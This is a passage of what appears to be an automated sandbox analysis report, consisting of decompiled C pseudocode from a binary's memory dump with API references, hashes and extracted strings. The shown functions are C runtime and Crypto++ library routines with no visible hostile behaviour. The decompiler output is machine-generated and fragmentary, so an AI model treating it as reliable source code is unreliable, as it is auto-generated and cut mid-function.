                    							_t78 = E01409B26(_t121,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xf, _v8 + 4,  &_v28);
                    							_v16 = _v8 + 8;
                    							_t82 = E01409B26(_t121,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0x10, _v8 + 8, 1);
                    							_t86 = E01409B26(_t121,  &_v28, 2,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8 + 0x30, _t128);
                    							if((E01409B26(_t121,  &_v28, 2, _t128, 0xf, _v8 + 0x34, 0xe) | _t76 | _t78 | _t82 | _t86) == 0) {
                    								_t123 =  *_v16;
                    								while( *_t123 != 0) {
                    									_t92 =  *_t123;
                    									if(_t92 < 0x30 || _t92 > 0x39) {
                    										if(_t92 != 0x3b) {
                    											goto L16;
                    										}
                    										_t139 = _t123;
                    										do {
                    											 *_t139 =  *((intOrPtr*)(_t139 + 1));
                    											_t139 = _t139 + 1;
                    										} while ( *_t139 != 0);
                    									} else {
                    										 *_t123 = _t92 - 0x30;
                    										L16:
                    										_t123 = _t123 + 1;
                    									}
                    								}
                    								_t127 = _v20;
                    								_t133 = _v8;
                    								goto L19;
                    							}
                    							E0140E2B4(_v8);
                    							_v16 = _v16 | 0xffffffff;
                    							goto L11;
                    						}
                    						E014012E1(_v8);
                    						return 1;
                    					}
                    					return 1;
                    				} else {
                    					_t127 = 0;
                    					_v12 = 0;
                    					_t133 = 0x1435348;
                    					L21:
                    					_t64 =  *(_t100 + 0x80);
                    					if(_t64 != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
                    						asm("lock xadd [ecx], eax");
                    						if((_t64 | 0xffffffff) == 0) {
                    							E014012E1( *((intOrPtr*)(_t100 + 0x7c)));
                    							E014012E1( *(_t100 + 0x88));
                    						}
                    					}
                    					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
                    					 *(_t100 + 0x80) = _t127;
                    					 *(_t100 + 0x88) = _t133;
                    					return 0;
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 0cfb1ca2a8874d778d6df56b915db9f26b7b657bb191de8903b4af511f96f91b
                    • Instruction ID: 0f0dbb2bd28d3c138dfc51a8f64cd7933102225a6396d6afb947f8a66c1aa698
                    • Opcode Fuzzy Hash: 0cfb1ca2a8874d778d6df56b915db9f26b7b657bb191de8903b4af511f96f91b
                    • Instruction Fuzzy Hash: C561B071900205AFDB22DFAAC880BAEBBF4EB54720F15457BE944FB3E1D67099518B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E01407B3A(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				signed char _v15;
                    				char _v16;
                    				void _v24;
                    				short _v28;
                    				char _v31;
                    				void _v32;
                    				long _v36;
                    				intOrPtr _v40;
                    				void* _v44;
                    				signed int _v48;
                    				signed char* _v52;
                    				long _v56;
                    				int _v60;
                    				void* __ebx;
                    				void* __ebp;
                    				signed int _t78;
                    				signed int _t80;
                    				int _t86;
                    				void* _t94;
                    				long _t97;
                    				void _t105;
                    				void* _t112;
                    				signed int _t115;
                    				signed int _t117;
                    				signed char _t122;
                    				signed char _t127;
                    				intOrPtr _t128;
                    				signed int _t130;
                    				signed char* _t131;
                    				intOrPtr* _t132;
                    				signed int _t133;
                    				void* _t134;
                    
                    				_t78 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t78 ^ _t133;
                    				_t80 = _a8;
                    				_t117 = _t80 >> 6;
                    				_t115 = (_t80 & 0x0000003f) * 0x30;
                    				_t131 = _a12;
                    				_v52 = _t131;
                    				_v48 = _t117;
                    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x143a740 + _t117 * 4)) + _t115 + 0x18));
                    				_v40 = _a16 + _t131;
                    				_t86 = GetConsoleCP();
                    				_t132 = _a4;
                    				_v60 = _t86;
                    				 *_t132 = 0;
                    				 *((intOrPtr*)(_t132 + 4)) = 0;
                    				 *((intOrPtr*)(_t132 + 8)) = 0;
                    				while(_t131 < _v40) {
                    					_v28 = 0;
                    					_v31 =  *_t131;
                    					_t128 =  *((intOrPtr*)(0x143a740 + _v48 * 4));
                    					_t122 =  *(_t128 + _t115 + 0x2d);
                    					if((_t122 & 0x00000004) == 0) {
                    						if(( *(E01400A0F(_t115, _t128) + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
                    							_push(1);
                    							_push(_t131);
                    							goto L8;
                    						} else {
                    							if(_t131 >= _v40) {
                    								_t130 = _v48;
                    								 *((char*)( *((intOrPtr*)(0x143a740 + _t130 * 4)) + _t115 + 0x2e)) =  *_t131;
                    								 *( *((intOrPtr*)(0x143a740 + _t130 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x143a740 + _t130 * 4)) + _t115 + 0x2d) | 0x00000004;
                    								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
                    							} else {
                    								_t112 = E01409359( &_v28, _t131, 2);
                    								_t134 = _t134 + 0xc;
                    								if(_t112 != 0xffffffff) {
                    									_t131 =  &(_t131[1]);
                    									goto L9;
                    								}
                    							}
                    						}
                    					} else {
                    						_t127 = _t122 & 0x000000fb;
                    						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
                    						_push(2);
                    						_v15 = _t127;
                    						 *(_t128 + _t115 + 0x2d) = _t127;
                    						_push( &_v16);
                    						L8:
                    						_push( &_v28);
                    						_t94 = E01409359();
                    						_t134 = _t134 + 0xc;
                    						if(_t94 != 0xffffffff) {
                    							L9:
                    							_t131 =  &(_t131[1]);
                    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                    							_v56 = _t97;
                    							if(_t97 != 0) {
                    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                    									L19:
                    									 *_t132 = GetLastError();
                    								} else {
                    									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
                    									if(_v36 >= _v56) {
                    										if(_v31 != 0xa) {
                    											goto L16;
                    										} else {
                    											_t105 = 0xd;
                    											_v32 = _t105;
                    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                    												goto L19;
                    											} else {
                    												if(_v36 >= 1) {
                    													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
                    													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
                    													goto L16;
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    					goto L20;
                    					L16:
                    				}
                    				L20:
                    				return E013F268B(_t132, _v8 ^ _t133);
                    			}

                    APIs
                    • GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,014082AF,?,?,00000000,?,?,?), ref: 01407B7C
                    • __fassign.LIBCMT ref: 01407BF7
                    • __fassign.LIBCMT ref: 01407C12
                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 01407C38
                    • WriteFile.KERNEL32(?,00000000,00000000,014082AF,00000000,?,?,?,?,?,?,?,?,?,014082AF,?), ref: 01407C57
                    • WriteFile.KERNEL32(?,?,00000001,014082AF,00000000,?,?,?,?,?,?,?,?,?,014082AF,?), ref: 01407C90
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: 682a7d6c3f46e0c712948e62a528a0c336532e581e2f9bb94eba264f7731e60a
                    • Instruction ID: 36e2fc44380f7f2e007058544a0e85f577f7cb6b348af79e76659e14e21b1800
                    • Opcode Fuzzy Hash: 682a7d6c3f46e0c712948e62a528a0c336532e581e2f9bb94eba264f7731e60a
                    • Instruction Fuzzy Hash: 8051D7719042499FDB11CFA9D884AEEBBF4EF09301F14816BE995E72A1E730AD41CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E013C34F6(void* __ebx, intOrPtr __ecx, void* __edx, void* __eflags) {
                    				void* _t32;
                    				void* _t34;
                    				void* _t37;
                    				void* _t39;
                    				void* _t42;
                    				void* _t44;
                    				void* _t54;
                    				intOrPtr _t55;
                    				intOrPtr _t56;
                    				void* _t66;
                    				intOrPtr _t68;
                    				intOrPtr* _t71;
                    				void* _t72;
                    
                    				_t66 = __edx;
                    				_t56 = __ecx;
                    				_t54 = __ebx;
                    				_push(0x94);
                    				E013F26C2(E014158E6);
                    				 *((intOrPtr*)(_t72 - 0x10)) = _t56;
                    				_push( *((intOrPtr*)(_t72 + 8)));
                    				_push("NameValuePairs: type mismatch for \'");
                    				_push(_t72 - 0xa0);
                    				_t32 = E013C1E24(_t66);
                    				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
                    				_t34 = E013C1DF7(_t54, _t56, _t66, _t72 - 0x88, _t32, "\', stored \'");
                    				_t55 =  *((intOrPtr*)(_t72 + 0xc));
                    				 *(_t72 - 4) = 1;
                    				_t37 = E013C1DF7(_t55, _t55 + 4, _t66, _t72 - 0x70, _t34, E013F4DFB(0x1439f60, _t55 + 4, 0x1439f60));
                    				 *(_t72 - 4) = 2;
                    				_t39 = E013C1DF7(_t55, _t55 + 4, _t66, _t72 - 0x58, _t37, "\', trying to retrieve \'");
                    				_t68 =  *((intOrPtr*)(_t72 + 0x10));
                    				 *(_t72 - 4) = 3;
                    				_t42 = E013C1DF7(_t55, _t68 + 4, _t66, _t72 - 0x40, _t39, E013F4DFB(_t68, _t68 + 4, 0x1439f60));
                    				 *(_t72 - 4) = 4;
                    				_t44 = E013C1DF7(_t55, _t68 + 4, _t66, _t72 - 0x28, _t42, 0x141a9b4);
                    				_t71 =  *((intOrPtr*)(_t72 - 0x10));
                    				_push(_t44);
                    				_push(1);
                    				 *(_t72 - 4) = 5;
                    				E013C2E51(_t71);
                    				 *_t71 = 0x141a97c;
                    				E013C6118(_t72 - 0x28, 1, 0);
                    				E013C6118(_t72 - 0x40, 1, 0);
                    				E013C6118(_t72 - 0x58, 1, 0);
                    				E013C6118(_t72 - 0x70, 1, 0);
                    				E013C6118(_t72 - 0x88, 1, 0);
                    				E013C6118(_t72 - 0xa0, 1, 0);
                    				 *_t71 = 0x141a9a0;
                    				 *((intOrPtr*)(_t71 + 0x28)) = _t55;
                    				 *((intOrPtr*)(_t71 + 0x2c)) = _t68;
                    				return E013F269C(_t71);
                    			}

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C3500
                      • Part of subcall function 013C1E24: __EH_prolog3.LIBCMT ref: 013C1E2B
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013C3545
                      • Part of subcall function 013F4DFB: ___unDName.LIBVCRUNTIME ref: 013F4E2E
                      • Part of subcall function 013F4DFB: InterlockedPushEntrySList.KERNEL32(?,?,?,?,01439F60,?,?,?,?,00000000,?), ref: 013F4EA2
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EAF
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EB7
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013C3576
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    Strings
                    • ', stored ', xrefs: 013C3520
                    • ', trying to retrieve ', xrefs: 013C3555
                    • NameValuePairs: type mismatch for ', xrefs: 013C3511
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$___std_type_info_name_free$EntryInterlockedListNamePush___un
                    • String ID: ', stored '$', trying to retrieve '$NameValuePairs: type mismatch for '
                    • API String ID: 468779367-3022120042
                    • Opcode ID: 469f2380fdafe6952b71aaaca0e5ce80e6c97fe37750fc9b20b8dab5b3840976
                    • Instruction ID: fc2452cffebfa3b6e71b144a34cb19b0090c34bca190d6629ca2ab6b88fd37b0
                    • Opcode Fuzzy Hash: 469f2380fdafe6952b71aaaca0e5ce80e6c97fe37750fc9b20b8dab5b3840976
                    • Instruction Fuzzy Hash: FB3197B1940349EBDB10EBA4CC56FEEB778AF24B18F50444DE544B7282DBB16E44CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140E7F2(intOrPtr _a4) {
                    				void* _t18;
                    
                    				_t45 = _a4;
                    				if(_a4 != 0) {
                    					E0140E539(_t45, 7);
                    					E0140E539(_t45 + 0x1c, 7);
                    					E0140E539(_t45 + 0x38, 0xc);
                    					E0140E539(_t45 + 0x68, 0xc);
                    					E0140E539(_t45 + 0x98, 2);
                    					E014012E1( *((intOrPtr*)(_t45 + 0xa0)));
                    					E014012E1( *((intOrPtr*)(_t45 + 0xa4)));
                    					E014012E1( *((intOrPtr*)(_t45 + 0xa8)));
                    					E0140E539(_t45 + 0xb4, 7);
                    					E0140E539(_t45 + 0xd0, 7);
                    					E0140E539(_t45 + 0xec, 0xc);
                    					E0140E539(_t45 + 0x11c, 0xc);
                    					E0140E539(_t45 + 0x14c, 2);
                    					E014012E1( *((intOrPtr*)(_t45 + 0x154)));
                    					E014012E1( *((intOrPtr*)(_t45 + 0x158)));
                    					E014012E1( *((intOrPtr*)(_t45 + 0x15c)));
                    					return E014012E1( *((intOrPtr*)(_t45 + 0x160)));
                    				}
                    				return _t18;
                    			}

                    APIs
                      • Part of subcall function 0140E539: _free.LIBCMT ref: 0140E562
                    • _free.LIBCMT ref: 0140E840
                      • Part of subcall function 014012E1: HeapFree.KERNEL32(00000000,00000000,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?), ref: 014012F7
                      • Part of subcall function 014012E1: GetLastError.KERNEL32(?,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?,?), ref: 01401309
                    • _free.LIBCMT ref: 0140E84B
                    • _free.LIBCMT ref: 0140E856
                    • _free.LIBCMT ref: 0140E8AA
                    • _free.LIBCMT ref: 0140E8B5
                    • _free.LIBCMT ref: 0140E8C0
                    • _free.LIBCMT ref: 0140E8CB
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 5e432f690a3c7708a87b86f27d3176ea985df772cf3bf4f9f96ad7372940b9b0
                    • Instruction ID: 31091a80a380074290b83aac1c3653f5a0e16b18b94bbf7187276d9fd1d0ae57
                    • Opcode Fuzzy Hash: 5e432f690a3c7708a87b86f27d3176ea985df772cf3bf4f9f96ad7372940b9b0
                    • Instruction Fuzzy Hash: C411FEB1540745AAD922BBF3DC85FCBB79C5F74700F804C3EB299B61E0E6B6A5244650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E013F7BAC(void* __ecx) {
                    				void* _t4;
                    				void* _t11;
                    				void* _t16;
                    				long _t25;
                    				void* _t28;
                    
                    				if( *0x1435260 != 0xffffffff) {
                    					_t25 = GetLastError();
                    					_t11 = E013F7A20(__eflags,  *0x1435260);
                    					__eflags = _t11 - 0xffffffff;
                    					if(_t11 == 0xffffffff) {
                    						L5:
                    						_t11 = 0;
                    					} else {
                    						__eflags = _t11;
                    						if(__eflags == 0) {
                    							_t4 = E013F7A5A(__eflags,  *0x1435260, 0xffffffff);
                    							_pop(_t16);
                    							__eflags = _t4;
                    							if(_t4 != 0) {
                    								_t28 = E014009B2(_t16, 1, 0x28);
                    								__eflags = _t28;
                    								if(__eflags == 0) {
                    									L8:
                    									_t11 = 0;
                    									E013F7A5A(__eflags,  *0x1435260, 0);
                    								} else {
                    									__eflags = E013F7A5A(__eflags,  *0x1435260, _t28);
                    									if(__eflags != 0) {
                    										_t11 = _t28;
                    										_t28 = 0;
                    										__eflags = 0;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    								E014012E1(_t28);
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    					SetLastError(_t25);
                    					return _t11;
                    				} else {
                    					return 0;
                    				}
                    			}

                    APIs
                    • GetLastError.KERNEL32(?,?,013F7BA3,013F4582,01433740,00000010,013F3D4A,?,?,?,?,?,00000000,?), ref: 013F7BBA
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 013F7BC8
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 013F7BE1
                    • SetLastError.KERNEL32(00000000,013F7BA3,013F4582,01433740,00000010,013F3D4A,?,?,?,?,?,00000000,?), ref: 013F7C33
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: ec710b9527b16c8d889fff0146edf9f96b60a06f8c6364594aa53686efaf70c7
                    • Instruction ID: 6e812b0354845d2e8b0a51ee8b918077fb64e2c1e23ee1477b9d1e527e76f384
                    • Opcode Fuzzy Hash: ec710b9527b16c8d889fff0146edf9f96b60a06f8c6364594aa53686efaf70c7
                    • Instruction Fuzzy Hash: 9501D43220D31A5EFE2626FD7C84A663B98EB1277D720023EF714552F5FF614805A790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E013C5393() {
                    				signed int _v4;
                    				intOrPtr _v20;
                    				char _v36;
                    				char _v76;
                    				intOrPtr _t31;
                    				char* _t35;
                    
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				E013C2AD0( &_v36, "CryptoMaterial: this object does not support precomputation");
                    				_v4 = _v4 & 0x00000000;
                    				_push( &_v36);
                    				_push(0);
                    				E013C2E51( &_v76);
                    				_v76 = 0x141a7e4;
                    				E013F4EC6( &_v76, 0x142fa1c);
                    				asm("int3");
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				E013C2AD0( &_v36, "StreamTransformation: this object doesn\'t support random access");
                    				_v4 = _v4 & 0x00000000;
                    				_push( &_v36);
                    				_push(0);
                    				_t35 =  &_v76;
                    				E013C2E51(_t35);
                    				_v76 = 0x141a7e4;
                    				E013F4EC6( &_v76, 0x142fa1c);
                    				asm("int3");
                    				_t31 = _v20;
                    				 *((intOrPtr*)(_t35 + 0xc)) = _t31;
                    				return _t31;
                    			}

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C539A
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C53CE
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    • __EH_prolog3.LIBCMT ref: 013C53DB
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C540F
                    Strings
                    • CryptoMaterial: this object does not support precomputation, xrefs: 013C539F
                    • StreamTransformation: this object doesn't support random access, xrefs: 013C53E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$Exception@8Throw$ExceptionRaise
                    • String ID: CryptoMaterial: this object does not support precomputation$StreamTransformation: this object doesn't support random access
                    • API String ID: 2363603681-320247676
                    • Opcode ID: 5dfd190b3158e9a9eec70b72c35b52b2283d1a07ac46ad3efc3b9ec67b3a691d
                    • Instruction ID: ffe5eba307e9615b4f8c6a2dde3212b82d030166861177521d1e98124e498797
                    • Opcode Fuzzy Hash: 5dfd190b3158e9a9eec70b72c35b52b2283d1a07ac46ad3efc3b9ec67b3a691d
                    • Instruction Fuzzy Hash: 8F017171A5020DABDB00EBD9D841BDEB7B8AB24B18F60841EA615B7150DB719E05CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E014057E4(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                    				signed int _v8;
                    				short _v270;
                    				short _v272;
                    				char _v528;
                    				char _v700;
                    				signed int _v704;
                    				signed int _v708;
                    				short _v710;
                    				signed int* _v712;
                    				signed int _v716;
                    				signed int _v720;
                    				intOrPtr _v724;
                    				signed int* _v728;
                    				signed int _v732;
                    				signed int _v736;
                    				signed int _v740;
                    				signed int _v744;
                    				signed int _t149;
                    				void* _t156;
                    				signed int _t157;
                    				signed int _t158;
                    				intOrPtr _t159;
                    				signed int _t162;
                    				signed int _t163;
                    				signed int _t166;
                    				signed int _t167;
                    				intOrPtr _t169;
                    				signed int _t172;
                    				signed int _t173;
                    				signed int _t175;
                    				signed int _t176;
                    				signed int _t194;
                    				signed int _t195;
                    				signed int _t198;
                    				signed int _t203;
                    				signed int _t205;
                    				signed int _t211;
                    				intOrPtr* _t212;
                    				signed int _t223;
                    				intOrPtr _t226;
                    				intOrPtr* _t227;
                    				signed int _t229;
                    				signed int* _t233;
                    				signed int _t240;
                    				void* _t241;
                    				signed int _t242;
                    				intOrPtr _t244;
                    				signed int _t249;
                    				signed int _t251;
                    				signed int _t255;
                    				signed int* _t256;
                    				intOrPtr* _t257;
                    				short _t258;
                    				signed int _t260;
                    				signed int _t262;
                    				void* _t264;
                    				void* _t266;
                    
                    				_t260 = _t262;
                    				_t149 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t149 ^ _t260;
                    				_push(__ebx);
                    				_t205 = _a8;
                    				_push(__esi);
                    				_push(__edi);
                    				_t244 = _a4;
                    				_v744 = _t205;
                    				_v728 = E01406A01(_t205, __ecx, __edx) + 0x278;
                    				_push( &_v708);
                    				_t156 = E01404F2E(_t205, __edx, _t244, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
                    				_t264 = _t262 - 0x2e4 + 0x18;
                    				if(_t156 != 0) {
                    					_t11 = _t205 + 2; // 0x6
                    					_t249 = _t11 << 4;
                    					__eflags = _t249;
                    					_t157 =  &_v272;
                    					_v716 = _t249;
                    					_t240 =  *(_t249 + _t244);
                    					_t211 = _t240;
                    					while(1) {
                    						_v704 = _v704 & 0x00000000;
                    						__eflags =  *_t157 -  *_t211;
                    						_t251 = _v716;
                    						if( *_t157 !=  *_t211) {
                    							break;
                    						}
                    						__eflags =  *_t157;
                    						if( *_t157 == 0) {
                    							L8:
                    							_t158 = _v704;
                    						} else {
                    							_t258 =  *((intOrPtr*)(_t157 + 2));
                    							__eflags = _t258 -  *((intOrPtr*)(_t211 + 2));
                    							_v710 = _t258;
                    							_t251 = _v716;
                    							if(_t258 !=  *((intOrPtr*)(_t211 + 2))) {
                    								break;
                    							} else {
                    								_t157 = _t157 + 4;
                    								_t211 = _t211 + 4;
                    								__eflags = _v710;
                    								if(_v710 != 0) {
                    									continue;
                    								} else {
                    									goto L8;
                    								}
                    							}
                    						}
                    						L10:
                    						__eflags = _t158;
                    						if(_t158 != 0) {
                    							_t212 =  &_v272;
                    							_t241 = _t212 + 2;
                    							do {
                    								_t159 =  *_t212;
                    								_t212 = _t212 + 2;
                    								__eflags = _t159 - _v704;
                    							} while (_t159 != _v704);
                    							_v720 = (_t212 - _t241 >> 1) + 1;
                    							_t162 = E0140131B(_t212 - _t241 >> 1, 4 + ((_t212 - _t241 >> 1) + 1) * 2);
                    							_v732 = _t162;
                    							__eflags = _t162;
                    							if(_t162 == 0) {
                    								goto L1;
                    							} else {
                    								_v724 =  *((intOrPtr*)(_t251 + _t244));
                    								_t35 = _t205 * 4; // 0xa094
                    								_v736 =  *((intOrPtr*)(_t244 + _t35 + 0xa0));
                    								_t38 = _t244 + 8; // 0x8b56ff8b
                    								_v740 =  *_t38;
                    								_t221 =  &_v272;
                    								_v712 = _t162 + 4;
                    								_t166 = E013FF144(_t162 + 4, _v720,  &_v272);
                    								_t266 = _t264 + 0xc;
                    								__eflags = _t166;
                    								if(_t166 != 0) {
                    									_t167 = _v704;
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									E013FDA8E();
                    									asm("int3");
                    									_t169 =  *0x143a65c; // 0x0
                    									return _t169;
                    								} else {
                    									__eflags = _v272 - 0x43;
                    									 *((intOrPtr*)(_t251 + _t244)) = _v712;
                    									if(_v272 != 0x43) {
                    										L19:
                    										_t172 = E01404C3B(_t205, _t221, _t244,  &_v700);
                    										_t223 = _v704;
                    										 *(_t244 + 0xa0 + _t205 * 4) = _t172;
                    									} else {
                    										__eflags = _v270;
                    										if(_v270 != 0) {
                    											goto L19;
                    										} else {
                    											_t223 = _v704;
                    											 *(_t244 + 0xa0 + _t205 * 4) = _t223;
                    										}
                    									}
                    									__eflags = _t205 - 2;
                    									if(_t205 != 2) {
                    										__eflags = _t205 - 1;
                    										if(_t205 != 1) {
                    											__eflags = _t205 - 5;
                    											if(_t205 == 5) {
                    												 *((intOrPtr*)(_t244 + 0x14)) = _v708;
                    											}
                    										} else {
                    											 *((intOrPtr*)(_t244 + 0x10)) = _v708;
                    										}
                    									} else {
                    										_t256 = _v728;
                    										_t242 = _t223;
                    										_t233 = _t256;
                    										 *(_t244 + 8) = _v708;
                    										_v712 = _t256;
                    										_v720 = _t256[8];
                    										_v708 = _t256[9];
                    										while(1) {
                    											_t64 = _t244 + 8; // 0x8b56ff8b
                    											__eflags =  *_t64 -  *_t233;
                    											if( *_t64 ==  *_t233) {
                    												break;
                    											}
                    											_t257 = _v712;
                    											_t242 = _t242 + 1;
                    											_t203 =  *_t233;
                    											 *_t257 = _v720;
                    											_v708 = _t233[1];
                    											_t233 = _t257 + 8;
                    											 *((intOrPtr*)(_t257 + 4)) = _v708;
                    											_t205 = _v744;
                    											_t256 = _v728;
                    											_v720 = _t203;
                    											_v712 = _t233;
                    											__eflags = _t242 - 5;
